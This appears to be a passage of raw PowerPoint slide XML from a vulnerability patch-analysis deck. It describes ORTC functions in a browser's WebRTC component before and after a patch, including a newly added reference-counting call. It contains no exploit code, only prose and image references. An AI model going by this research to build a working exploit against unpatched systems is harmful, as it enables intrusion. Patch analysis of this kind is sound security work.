          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1070594" y="4818199"/>
            <a:ext cx="5484258" cy="1463843"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="图片 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8E97A4F-0C4A-45F3-BE53-3EA69EEFFD09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078126" y="3012359"/>
            <a:ext cx="5431364" cy="1787710"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="矩形 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DFD24AA-684D-495A-A90A-DA55ED467FF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6524552" y="6486162"/>
            <a:ext cx="5514559" cy="3494546"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UnpackSequenceOfDictionaryFromVar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> first checks if the passed argument is an array of objects. Then create an edge of its own </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ModernArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> structure, and then the function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UnpackArrayObjectVar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to parse the dynamic object containing the dictionary type structure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>structure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in the array of incoming objects, and save the result in its own </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ModernArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> structure.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9E3E5CF-B519-4AF5-B182-16245146B018}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6934200" y="3092318"/>
            <a:ext cx="2962275"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FEEA659F-EB40-4B6D-BBF2-4A8D2854295C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1070593" y="4605342"/>
            <a:ext cx="2567957" cy="19472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4" name="连接符: 肘形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DF034D2-B919-4DAB-BE7F-6ADEB4EC002C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="20" idx="3"/>
            <a:endCxn id="19" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3638550" y="3192235"/>
            <a:ext cx="3295650" cy="1510471"/>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矩形 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{518D6CC9-BAB5-4505-8EE0-77B5C279B98B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7056740" y="3557632"/>
            <a:ext cx="2331221"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2" name="矩形 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8C17018-07C9-4611-B19A-554BA522C335}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1063062" y="7895202"/>
            <a:ext cx="3013638" cy="19472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6" name="连接符: 肘形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A20D503B-CD30-48E3-AA29-162A6B834D18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="22" idx="3"/>
            <a:endCxn id="21" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4076700" y="3657549"/>
            <a:ext cx="2980040" cy="4335017"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 67899"/>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矩形 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07DFB36A-5949-4696-B5E8-DAC3BEE3198B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4564755" y="5137978"/>
            <a:ext cx="1944735" cy="19472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16B0C233-64C1-41F4-AA4B-36AED59FFDF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1061068" y="6422754"/>
            <a:ext cx="1472582" cy="19472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2" name="连接符: 肘形 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{058B02F9-0B75-4995-B50F-C49B242CCA83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="24" idx="1"/>
            <a:endCxn id="29" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2533651" y="5235341"/>
            <a:ext cx="2031105" cy="1284775"/>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13349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61665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Before the patch, the function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UnpackSequenceOfDictionaryFromVar</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F45F0DDD-059C-4059-8C3E-A281EDC6345C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6830774" y="3111368"/>
            <a:ext cx="5200806" cy="3089407"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="矩形 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DFD24AA-684D-495A-A90A-DA55ED467FF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1102329" y="8405536"/>
            <a:ext cx="10863026" cy="1112997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The function in the figure will take each dynamic object from the created </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ModernArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> structure, call the function ORTC::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UnpackRTCIceCandidateFromVarToCollection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to parse the dictionary structure and subsequent processing.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{518D6CC9-BAB5-4505-8EE0-77B5C279B98B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7400925" y="4683124"/>
            <a:ext cx="4630655"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059F1934-662A-4D2C-8974-5BB3A9D8407D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1102329" y="3695569"/>
            <a:ext cx="5707976" cy="1546356"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="图片 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2974D883-B11D-4A47-B380-576493001DC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078826" y="6083604"/>
            <a:ext cx="5714296" cy="1885646"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="矩形 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F4C3385-59F3-4ECA-8DE6-B607113BB06A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7400925" y="5149657"/>
            <a:ext cx="3009900"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A02B762E-6996-4A5F-914E-1F793FA84466}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1094798" y="3841529"/>
            <a:ext cx="1555710" cy="1998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 name="连接符: 肘形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0A3AD49-1954-4114-B0BF-182547B0AAAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="27" idx="0"/>
            <a:endCxn id="21" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="5373655" y="340526"/>
            <a:ext cx="841595" cy="7843600"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -74698"/>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矩形 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F65D74A3-36B4-4838-B7D0-C5C05C88F1F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2667180" y="3834956"/>
            <a:ext cx="2076270" cy="20640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FC907AAC-002E-4B35-9D38-0C6F0DF1A809}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="6235668"/>
            <a:ext cx="1572383" cy="20640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12" name="连接符: 肘形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C68C693-3CDE-46B3-AA34-7FB744C97683}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="30" idx="2"/>
            <a:endCxn id="31" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1687663" y="4218016"/>
            <a:ext cx="2194306" cy="1840998"/>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607043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Vulnerability Analysis: Patch Analysis</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="36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61665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Function ORTC::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UnpackArrayObjectVar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> patch comparison</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73DB8E3B-6A56-48B7-8107-16CAA4C0E293}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104674" y="3929139"/>
            <a:ext cx="5679685" cy="4609599"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="图片 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B492EF36-2F09-4F87-AE04-865F2A2A957F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6844029" y="3877282"/>
            <a:ext cx="5214100" cy="4713312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="矩形 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BA5E66B-D8DF-4393-8CA9-72B69F8343B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4935546" y="4005009"/>
            <a:ext cx="1878648" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Before patch</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="矩形 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC5EA1CB-11A7-4D35-BAD5-46F858D47B00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10212602" y="4005009"/>
            <a:ext cx="1878648" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>After patch</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="矩形 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8667CCDA-B5B2-4EE8-A540-D9E33833CD93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7493000" y="7518400"/>
            <a:ext cx="2241550" cy="11527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6615AAFA-AB65-4455-8EAA-0E2B65394199}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8130510" y="7883715"/>
            <a:ext cx="4164184" cy="772776"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>New function CJScript9Holder::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>VarAddRef</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="869504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61665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Function ORTC::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UnpackArrayObjectVar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> after patch</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{138C87F5-1FFC-4B22-9788-B9164DD3A617}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="3012358"/>
            <a:ext cx="5793111" cy="5236712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6932B53B-43E3-49C1-94C6-9CCD50232F8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="8313391"/>
            <a:ext cx="5793111" cy="1892368"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6D0C47C-4414-48C5-B7D6-916132DCF692}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6871237" y="2983245"/>
            <a:ext cx="5160344" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The function ORTC::</a:t>
            </a:r>
            <a:r>
